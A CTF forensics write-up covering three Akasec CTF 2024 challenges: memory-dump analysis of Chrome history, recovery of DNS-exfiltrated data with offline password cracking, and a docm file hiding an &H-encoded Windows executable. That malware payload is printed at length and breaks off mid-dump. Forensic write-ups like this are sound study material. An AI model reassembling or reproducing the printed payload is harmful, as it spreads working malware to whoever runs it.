Akasec CTF 2024 - Writeups
This is a writeup for all forensics challenges from Akasec CTF 2024. This was my first CTF playing for team L3ak and we managed to achieve first place 🥇 with several bloods 🩸 for other categories. Very happy with the teamwork we had this CTF and I hope L3ak will be more recognized in the future.
Portugal [Forensics]
Question: I accidentally left my computer unlocked at the coffee shop while I stepped away. I’m sure that someone took advantage of the opportunity and was searching for something.
Flag: AKASEC{V0L4T1L1TY_f0r_chr0m3_s34rch_h1st0ry}
We are given a memory dump to investigate. Reading the description, the person seemed to have searched for something online using the victim’s computer. Hence, we can search for browser artifacts to analyze the user’s search history. In this scenario, it seems that the browser used was Google Chrome according to the processes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
└─$ python3 vol.py -f ~/Desktop/sharedfolder/AkasecCTF/Portugal/memdump1.mem windows.pslist
Volatility 3 Framework 2.7.0
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0x8453eb40 110 - N/A False 2024-05-28 10:35:34.000000 N/A Disabled
276 4 smss.exe 0x89897040 3 - N/A False 2024-05-28 10:35:34.000000 N/A Disabled
352 340 csrss.exe 0x89875c40 10 - 0 False 2024-05-28 10:35:34.000000 N/A Disabled
412 340 wininit.exe 0x8f264c40 5 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
420 404 csrss.exe 0x8f274c40 13 - 1 False 2024-05-28 10:35:35.000000 N/A Disabled
464 404 winlogon.exe 0x8f289c40 7 - 1 False 2024-05-28 10:35:35.000000 N/A Disabled
504 412 services.exe 0x899dda40 18 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
512 412 lsass.exe 0x8f2af040 11 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
596 504 svchost.exe 0x8f330040 37 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
644 504 svchost.exe 0x8f33f500 15 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
720 464 dwm.exe 0x8f369040 13 - 1 False 2024-05-28 10:35:35.000000 N/A Disabled
836 504 svchost.exe 0x8f3bfb00 55 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
848 504 svchost.exe 0x8f860300 29 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
880 504 svchost.exe 0x8f9857c0 24 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
1004 504 svchost.exe 0x84539880 25 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
1020 504 svchost.exe 0x845b0840 15 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
1036 504 svchost.exe 0x845da040 38 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
1196 504 svchost.exe 0x845bb600 26 - 0 False 2024-05-28 10:35:35.000000 N/A Disabled
1296 504 spoolsv.exe 0x8f8f0040 7 - 0 False 2024-05-28 10:35:36.000000 N/A Disabled
1476 504 svchost.exe 0x921630c0 13 - 0 False 2024-05-28 10:35:36.000000 N/A Disabled
1712 504 MsMpEng.exe 0x984514c0 26 - 0 False 2024-05-28 10:35:36.000000 N/A Disabled
1720 504 svchost.exe 0x98453c40 10 - 0 False 2024-05-28 10:35:36.000000 N/A Disabled
1180 836 sihost.exe 0x984e4580 17 - 1 False 2024-05-28 10:35:37.000000 N/A Disabled
2140 836 taskeng.exe 0x98473a00 7 - 0 False 2024-05-28 10:35:37.000000 N/A Disabled
2160 464 userinit.exe 0x9a0b2040 0 - 1 False 2024-05-28 10:35:37.000000 2024-05-28 10:36:04.000000 Disabled
2228 2160 explorer.exe 0x87a0ec40 64 - 1 False 2024-05-28 10:35:37.000000 N/A Disabled
2488 596 RuntimeBroker. 0x9d62f900 8 - 1 False 2024-05-28 10:35:38.000000 N/A Disabled
2536 836 taskhostw.exe 0x9d632040 9 - 1 False 2024-05-28 10:35:38.000000 N/A Disabled
2620 1020 dasHost.exe 0x9d6cb8c0 18 - 0 False 2024-05-28 10:35:40.000000 N/A Disabled
2832 504 SearchIndexer. 0x8144e040 15 - 0 False 2024-05-28 10:35:41.000000 N/A Disabled
2924 504 NisSrv.exe 0x92185040 9 - 0 False 2024-05-28 10:35:41.000000 N/A Disabled
3180 596 SkypeHost.exe 0x8147ac40 7 - 1 False 2024-05-28 10:35:42.000000 N/A Disabled
3328 596 WmiPrvSE.exe 0x9d60e9c0 10 - 0 False 2024-05-28 10:35:43.000000 N/A Disabled
3464 596 ShellExperienc 0x8153c580 27 - 1 False 2024-05-28 10:35:44.000000 N/A Disabled
3572 596 SearchUI.exe 0x81583c40 37 - 1 False 2024-05-28 10:35:44.000000 N/A Disabled
3780 596 dllhost.exe 0x88fa7980 9 - 1 False 2024-05-28 10:35:44.000000 N/A Disabled
4088 2832 SearchProtocol 0xa2e4a040 7 - 1 False 2024-05-28 10:35:46.000000 N/A Disabled
1596 2832 SearchFilterHo 0x985745c0 6 - 0 False 2024-05-28 10:35:46.000000 N/A Disabled
1740 2832 SearchProtocol 0x9a1e8940 7 - 0 False 2024-05-28 10:35:47.000000 N/A Disabled
3980 1004 audiodg.exe 0x81438640 9 - 0 False 2024-05-28 10:35:54.000000 N/A Disabled
800 2228 FTK Imager.exe 0x8f213c00 22 - 1 False 2024-05-28 10:35:55.000000 N/A Disabled
728 2228 OneDrive.exe 0xa2e47c40 22 - 1 False 2024-05-28 10:35:55.000000 N/A Disabled
1240 2228 chrome.exe 0x9d7d7c40 40 - 1 False 2024-05-28 10:35:56.000000 N/A Disabled
1272 1240 chrome.exe 0xa2ec2840 8 - 1 False 2024-05-28 10:35:56.000000 N/A Disabled
2316 1240 chrome.exe 0x9d787340 14 - 1 False 2024-05-28 10:35:58.000000 N/A Disabled
4104 1240 chrome.exe 0x89928480 16 - 1 False 2024-05-28 10:35:58.000000 N/A Disabled
4112 1240 chrome.exe 0x9d7df900 7 - 1 False 2024-05-28 10:35:58.000000 N/A Disabled
4752 1240 chrome.exe 0x9d7df300 7 - 1 False 2024-05-28 10:36:03.000000 N/A Disabled
4900 1240 chrome.exe 0x815e66c0 15 - 1 False 2024-05-28 10:36:15.000000 N/A Disabled
4968 1240 chrome.exe 0x9d63e040 15 - 1 False 2024-05-28 10:36:16.000000 N/A Disabled
5284 596 dllhost.exe 0x8159cc40 1 - 1 False 2024-05-28 10:36:31.000000 N/A Disabled
1
2
3
└─$ python3 vol.py -f ~/Desktop/sharedfolder/AkasecCTF/Portugal/memdump1.mem windows.filescan | grep "History"
0x81595680 100.0\Users\d33znu75\AppData\Local\Google\Chrome\User Data\Default\History 128
0x9845ab30 \ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\MpScanCache-0.bin 128
However, it seems that the artifact was malformed and could not be analyzed on DB browser. So, just use strings to get the flag manually.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ strings ../sharedfolder/file.0x81595680.0x98570f60.DataSectionObject.History.dat
--- SNIP ---
18- h_)
21- 0r(
19- h1'
20- st&
22- y}%
17- rc$
look !! its here yay*
16- 34
15- _s
14- m3
13- r0
12- ch
11- r_
10- f0
9- Y_
8- 1T
7- 1L
6- 4T
5- 0L
4- {V
3- EC
2- AS
1- AK
--- SNIP ---
Sussy [Forensics]
Question: Something Fishy’s Going on in Our Network
Flag: AKASEC{PC4P_DNS_3xf1ltr4t10n_D0n3!!}
We are given a PCAP file to investigate. Analyzing it, several protocols can be identified including DNS, TLS and HTTP. However, it seems that the subdomains for akasec.ma
were seemingly suspicious, suggesting a DNS tunneling attempt to hide the flag.
Using this script, all the subdomains from akasec.ma
can be extracted and concatenated into a 7z file.
1
tshark -r packet.pcapng -Y 'dns.qry.name matches "akasec"' -T fields -e dns.qry.name | uniq | awk '{gsub(/.akasec.ma/, "")}1' | xxd -r -p > flag.7z
However, the zip file seems to be password-protected. So we can just brute force crack it with John the Ripper.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ 7z2john flag.7z > output.txt
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
└─$ john output.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 5 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 13035 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hellokitty (flag.7z)
1g 0:00:00:07 DONE (2024-06-12 08:03) 0.1404g/s 31.46p/s 31.46c/s 31.46C/s pamela..horses
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With the password, another password-protected PDF file can be obtained.
1
2
3
┌──(kali㉿kali)-[~/Desktop/sharedfolder/AkasecCTF/Sussy]
└─$ file flag
flag: PDF document, version 1.4, 1 page(s)
Similarly, just brute force crack it with John the Ripper.
1
2
3
4
5
6
7
8
9
10
11
12
└─$ pdf2john flag > hash.txt
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meow (flag)
1g 0:00:00:00 DONE (2024-06-12 08:07) 3.571g/s 114514p/s 114514c/s 114514C/s nuria..luckycat
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
With the password, just open the PDF file and obtain the flag. Shoutout to my teammate @Nex0 for solving this challenge.
saveme [Forensics]
Question: You know what to do. Get after it! WARNING:”It’s a malware, BE CAREFUL”
Flag: AKASEC{F_MiCRoSft_777}
We are given a docm file with several encrypted images. Analyzing the docm file with oletools, no macros can be found within it. However, hidden text can be found when manually analyzing the docm file.
1
2
3
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H33&H5F&HEC&H22&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDA&HD9&HB8&H8A&H0C&H44&H06&HD9&H74&H24&HF4&H5D&H29&HC9&H66&HB9&H04&H02&H83&HED&HFC&H31&H45&H16&H03&H45&H9C&HEE&HB1&H37&H60&H86&H31&H28&H20&H57&H26&HB7&H90&H33&H2F&H67&H2C&H53&HAD&H68&HCC&HA4&HD2&HE1&H29&H95&HD2&H96&H3A&H86&HE2&HDD&H6E&H2B&H88&HB0&H9A&HB8&HFC&H1C&HAD&H09&H4A&H7B&H80&H8A&HE7&HBF&H83&H08&HFA&H93&H63&H30&H35&HE6&H62&H75&H28&H0B&H36&H2E&H26&HBE&HA6&H5B&H72&H03&H4D&H17&H92&H03&HB2&HE0&H95&H22&H65&H7A&HCC&HE4&H84&HAF&H64&HAD&H9E&HAC&H41&H67&H15&H06&H3D&H76&HFF&H56&HBE&HD5&H3E&H57&H4D&H27&H07&H50&HAE&H52&H71&HA2&H53&H65&H46&HD8&H8F&HE0&H5C&H7A&H5B&H52&HB8&H7A&H88&H05&H4B&H70&H65&H41&H13&H95&H78&H86&H28&HA1&HF1&H29&HFE&H23&H41&H0E&HDA&H68&H11&H2F&H7B&HD5&HF4&H50&H9B&HB6&HA9&HF4&HD0&H5B&HBD&H84&HBB&H31&H40&H1A&HC6&H74&H42&H24&HC8&H28&H2B&H15&H43&HA7&H2C&HAA&H86&H83&HC3&HE0&H8A&HA2&H4B&HAD&H5F&HF7&H11&H4E&H8A&H34&H2C&HCD&H3E&HC5&HCB&HCD&H4B&HC0&H90&H49&HA0&HB8&H89&H3F&HC6&H6F&HA9&H15&HB6&HE0&H22&HF3&H44&H8C&HA4&H9E&HC4&H1E&H15&H43&H5D&H9A&H0D&HAB&H13&H41&HD9&H86&HE4&HEB&H4F&HBC&H99&H9F&HAF&H70&H38&H14&H9E&HFB&HA7&HB6&H9D&H6F&H4E&H52&H4C&H04&HB9&HB2&HF4&H8B&HCE&HA4&H98&H3C&H51&H5D&H32&HB7&HE3&HF4&HDA&H50&H2B&H20&H4B&HEB&H5F&H5E&HB1&H3C&HB0&HAC&HF5&H6C&HF6&HE1&HDB&H41&H35&H32&H0A&H93&H0E&H0A&H68&HEB&H40&H52&HBC&H24&HD2&HC3&HD2&H49&H7D&H69&H5C&HCF&HF3&H14&H8C&H6A&H8B&HB3&HF7&H5D&H49&H3C&H2A&H9C&HC4&H6E&HDB&H5A&H42&H3E&H18&H51&H34&H2C&H7B&H31&H3E&H2D&H2A&H68&H2D&H30&HE3&H20&HC4&H7C&H1C&H71&H29&H4E&HE2&H34&H93&H08&H73&H69&HE6&HE8&H06&H3C&H3F&HE8&H75&HCF&H22&HFE&H56&HBB&HAF&H36&HE3&H9F&HD6&H3C&H72&HE8&HBE&HE9&HA8&H42&H00&HEB&HD8&H3F&H43&H89&H67&H0E&H78&HC3&H78&HBC&H4B&H32&H3F&HB0&H13&H07&H10&H3A&H73&HE0&H80&H70&H87&H9A&H71&HD7&HFC&HE8&HB6&HCD&H12&H07&H5E&H7C&H5C&H88&H3D&HAC&HFB&HAE&HF4&H5F&HDB&H9B&H28&HD8&H1A&H2C&H84&H33&H80&H98&H2F&H06&HB5&H04&H93&HFD&H7C&H92&H9A&H13&H65&H38&HF7&HBB&H0B&HC4&H3C&HE2&HD0&H8E&HD2&H20&H9D&H13&H7B&HA0&HE2&HE9&HDD&HC4&H9A&H34&H0A&HEB&HB5&H8D&H4D&H53&H5C&HC4&H33&H27&H1F&H82&H81&HD2&HF2&H12&HB4&HA3&H70&H51&HD0&HCC&HB6&HAD&H20&HFF&HC3&H15&H7C&H02&H50&H92&H54&H50&H5C&H6C&HD6&H45&HC7&H87&HCF&HF5&H06&H3C&H61&H71&HD5&HB4&HDB&H9E&H9F&HF8&HAB&HAE&H25&H8F&H56&HE6&HC1&H92&HA9&H7E&H13&HD8&H57&H3F&H17&H80&H05&HAE&H8C&HFE&H25&H77&H07&HAB&H11&HEE&H30&HE7&HA9&H63&HB6&H05&H5D&HDC&HB5&H1D&H77&H0D&HC1&HEF&H90&HCE&HB8&H9B&H06&H6F&HDE&HE5&HC7&H1C&HAA&H42&HAF&H28&H5E&H03&H63&H9C&H87&H89&H88&HB3&H31&HEF&H89&H45&HDF&H78&H3D&H3E&HDF&HC8&HAD&H30&H49&HBB&HEF&H5D&HA6&H79&H92&HC5&H7A&HE1&HE2&H6F&HE9&HC8&H95&H9A&H0E&H01&H73&H2A&H78&H47&H82&H0B&HCF&H47&H04&HDD&H3A&HDC&H9C&HBB&HDB&HC4&H83&HBB&H8B&H0E&H95&H34&H1B&HCC&H7B&H99&HD0&H48&H5E&H04&HEC&H75&H3A&HBE&HC8&H8F&HB5&H55&H3F&H98&H20&H78&H85&HED&HA7&H21&H53&H29&HAB&H42&H0E&HC8&H63&H52&HD3&H1F&H2E&HB8&H8D&H89&H8E&HB1&HAA&H02&H01&H8E&H76&H35&H81&H63&H54&H2E&H2F&H69&H43&H74&H11&H2D&HC9&H34&H2C&H6A&H04&H1F&H8C&H71&HB9&HB8&H6E&HCA&HC0&HE8&H01&HFE&H7B&H82&H21&H74&H38&H57&HBC&H20&H45&H15&HB4&H6D&HF4&HE6&H5D&HA1&H59&H78&H4B&H80&HE0&HBC&HA2&HDA&H97&HF0&HE7&H28&HA9&H78&H74&H69&H20&H2D&H4C&H59&H44&H7C&H0F&H23&HD7&HB0&H11&H03&HD7&H65&HE8&HAF&HC8&HA7&H09&HD5&H48&H61&H60&H55&HC2&H0D&HD6&HE5&HBA&H4E&H21&H70&H51&H6C&H29&HD7&H08&HC0&HD0&H9E&HC2&H64&HB3&H54&H29&H77&H15&H24&HAA&HBB&H39&HC1&HE3&H41&H8B&H5F&HE7&H1F&H27&HC6&H57&H69&H2F&H64&HE7&HEC&H04&H1F&HF2&H55&H71&HA3&HAE&H0E&H0B&H28&H16&H5B&H80&HF4&HE1&H49&HD3&HE8&H5C&HC2&HF8&HFA&H24&H7B&H6A&HB4&HCA&H5C&HA1&H17&H02&HB0&HBE&H42&HA5&H78&H47&H60&H7E&H3A&HCF&H6B&H70&H3A&H5C&HC0&H1B&H2A&HED&H54&H34&HF1&HE7&H58&H59&H6F&HAC&HDE&HC2&H88&H18&H5C&H6C&H1B&H3A&H3C&H87&H97&H82&HF5&H2C&H9F&H1B&HCE&HE7&HF2&HF0&HA0&H78&H33&H8A&HF0&HEC&HB6&H8E&H69&H77&H19&HA1&H03&H3A&H48&H79&H9D&H98&H9E&HF4&H2D&H25&H33&HD4&HEA&HCA&H9D&H2A&H0A&HDD&H5D&HA3&HA6&HD1&HC6&HFE&HC8&HAD&H87&H3A&H61&H70&HA3&H99&H73&HB0&HDA&HD4&H7E&H6A&H0C&H51&HA3&H6B&H83&HC0&HDE&H26&H9E&HC6&HF0&H9E&H54&H8E&H64&H0C&H16&H5E&H80&H10&H6E&H79&HEC&H58&H58&H7F&HEC&HBB&HF7&H71&H87&H17&H3C&H97&H52&H81&H50&HE5&H15&HA3&H07&H99
&HDE&HC5&HDD&H3C&H49&H9D&HE2&HE6&HCE&HCF&H11&H3E&HC3&H92&H26&HB3&HD7&H58&H46&H28&HEE&HAF&H84&HB1&H8A&H56&HD3&H7D&H90&H59&HE6&H18&H99&H96&HD0&HA6&H70&HA3&H39&H55&H33&H91&HFA&H14&H53&HA7&HD9&H81&H63&H1C&HA1&H37&H51&H78&H0C&HBD&HCD&H8B&H6D&HF7&H44&HEF&H7B&H42&HA7&HA7&H2E&H48&H1D&HF8&H22&H65&H2D&H85&H54&H86&HEC&H38&H04&H33&H74&HE9&H53&H28&H48&HFF&HE8&H30&H2F&HD6&HD3&HAD&HF7&H52&HFF&HE1&HBC&H69&HD6&HA0&HE1&HC1&HDD&HFE&H23&HE7&H49&HDA&H3A&HC6&H1A&H99&H87&HD9&H45&HC9&H63&HD4&H25&H6E&H6C&H13&HBA&H29&H50&HD2&HC9&HFA&HEF&H5A&H45&H31&HB8&H52&HEC&H6F&H8A&H9E&HEA&H06&HC3&H09&H71&H46&H43&HBE&HA5&H15&HE5&HEC&H12&HA6&HBE&H53&H3A&H8E&H5F&H53&HE0&HC7&H59&HDC&H7F&HCB&H6D&HB4&H0C&H71&H82&H60&H2C&H80&H8D&H95&HDF&HF5&HA8&H9D&HE0&HE9&HCE&HCF&HCD&H8D&H36&H52&H70&HCE&H97&H7C&H59&HD4&H70&HB5&H11&HEB&HA7&H60&HB4&H6B&H89&HB7&HE8&HAF&H6A&H7F&HF2&H9A&H2F&H5B&HDD&HE5&HCD&HAF&H0E&H8D&H6F&HBE&H91&H66&HFD&H87&HE2&H44&H32&HC0&H8E&H27&HC7&H4E&H82&H91&HD9&HEE&H98&H9A&H01&H38&HA9&H23&H6D&HA2&H0E&HB3&HEE&H5B&H0C&HA8&HC5&H69&HE7&H69&H0E&H0C&H4E&H7C&H7D&H64&HA9&HE5&H2C&H38&H79&H7B&H64&H02&H3A&H70&H26&H65&H36&H53&HD1&HD6&HFE&HD9&H47&H12&HDA&HC1&HEB&HE8&H31&H99&H69&HC1&H55&H23&H52&H14&HFF&HA4&HFB&HE0&HD9&HD6&HED&HDA&HCB&H3D&HB1&HC8&HEB&H21&HCA&H91&HD3&HDB&HE5&H77&H80&HD9&H90&HEB&H99&H4B&H14&HCC&H18&H5A&H90&H7C&HD3&H41&H2F&H2B&H6F&HFD&H24&H8A&H78&H8A&HEA&HD8&H3E&HFF&HA0&HD7&HC2&H9A&H48&H2B&H79&H46&HCE&H66&H7B&H41&HD2&H8A&H8C&H9D&H30&H07&HA7&HA0&H77&HC4&H27&HF0&HBD&H9B&H70&H53&H2D&HF9&H7D&H18&H9C&H91&H1E&H8A&H0B&H32&H1A&H73&H3F&H11&H80&H92&HD5&H9E&HF2&HE4&H25&HB7&H70&H99&H60&HFB&H61&H9F&H1A&HA5&H3B&H28&H13&H3E&HDF&HF9&HBB&H90&HDE&H98&H95&H3F&H0F&H1D&HC6&H73&H0D&H00&H3A&HF0&H0E&H97&HB2&H98&HF7&H4F&H69&HD8&H3E&H66&HD6&HEC&H00&H8A&H0F&H5D&H33&HCD&H80&HA9&HDA&HFA&HEE&HD4&HB9&H48&H98&HB4&HFC&H5E&HF1&HFC&H2B&H3C&H05&H38&HA0&HA9&H92&H30&HA4&HB6&H44&H38&H35&HC9&HDE&HC6&HAB&H8E&H0A&H31&H1C&HFC&H25&HC9&HCE&HDF&HB9&H77&H1F&HD6&H74&H74&H08&H37&H30&HD1&HF0&HA9&H82&H1B&HFB&H62&H4C&H6A&H55&H77&HDE&H7B&HE7&H1A&H61&H9F&HEF&HD9&HF5&H06&H7F&H89&H88&HDE&H9D&HFF&H7B&HDF&H4C&H37&HA0&HE9&H3E&HBA&H7E&H78&H6B&HF1&H87&HEC&H2D&H49&H30&HA5&H91&HFE&H32&HF6&H6C&H1D&H79&HB1&H87&H96&H8C&HA1&H72&HB7&H86&HE4&HB6&H0E&H1D&HB0&H75&H01&HF9&H20&H98&H90&H8B&H80&H5B&H90&H7E&HEA&HE8&HA4&H4D&HCC&H36&H77&HB4&HB9&H77&HBC&H0C&HCF&HEE&H11&H2A&HF1&H3C&H42&H8E&HDB&H1A&H0A&H5A&H33&HC5&H16&H8D&H3D&H64&H6A&HF7&HEB&HB0&H63&H09&H59&H59&H5F&HAF&HE4&H69&H72&HEE&HD2&H4C&HF9&HB5&HAD&H7F&H0A&H06&HDF&HF3&H0E&H14&H96&H9C&H2A&H52&HF1&H66&HB9&H0F&HF4&HF0&H4C&H1B&H5D&HAA&HE7&H7C&H66&H8A&H95&HB4&HFE&H59&H05&HEF&H8D&HAC&H65&HBC&H7D&H04&HB8&HDD&H56&H3D&H2E&HB9&H45&H10&H82&HD9&HC2&HF3&H5C&H47&H8E&H15&H0D&HA4&H21&HFB&HC5&H63&H6B&H33&H8D&HFE&H32&HDC&H41&H8C&H96&HDE&H7B&H85&H66&HCB&H68&H42&HFF&H4A&HC8&HF7&H4D&H2F&HB9&H77&H7F&HA5&H9C&HA2&H9D&HCA&H96&HFE&H99&HF3&H5C&H0B&H39&H3B&H56&HC6&HA0&H29&HBB&HFB&HE9&HD7&HD6&HCD&H52&H00&H25&H0F&H0C&H5C&H82&H38&H9A&H67&H35&H0F&H2E&H1D&H5F&HA1&H6D&H42&HD6&H5E&H26&HA9&HFA&H62&H60&HEE&H18&H03&HC5&H80&HF7&HA9&HD7&H6A&HB9&H55&H21&H64&H9D&H3F&HA3&HAE&H63&H16&H2F&H18&HAD&H33&H34&H56&H76&H2E&H9D&HC9&HE8&HBC&H84&H4A&H2F&H53&HD6&H87&H8B&H3D&H33&H93&HE0&H0A&H88&H42&HB8&HC6&HE0&HF3&H4C&H13&HB5&HEC&H74&HB8&H36&H32&H66&HA7&H1F&HDE&H27&H8D&HEF&HA7&HBD&H55&H79&HCA&H2A&H91&HD8&H83&H0C&H39&H94&H88&H8D&HCB&H6D&H26&H68&H48&H6D&HF7&H3F&HA9&H6F&HB4&HFC&H84&HE5&HD7&HD7&HDE&H98&H71&HC9&HEF&H8B&H8A&H57&H32&H64&HF1&HE0&H48&H6D&H91&H85&HE0&H77&HD5&H79&H9B&H6F&HFA&H8F&HC1&H04&H87&H96&HEE&HE2&H4D&HEE&HB1&H48&HBF&H8E&HBE&H6A&H65&H24&HBB&H33&HEF&H3C&H46&H25&HCE&H55&H2E&H66&H41&H8F&H7D&HD9&H11&HC3&H33&H8C&H9F&H88&H4A&H91&H15&HB1&H1C&H57&HCF&H9F&H09&H60&H5B&H53&H26&H42&H72&H14&H40&H3A&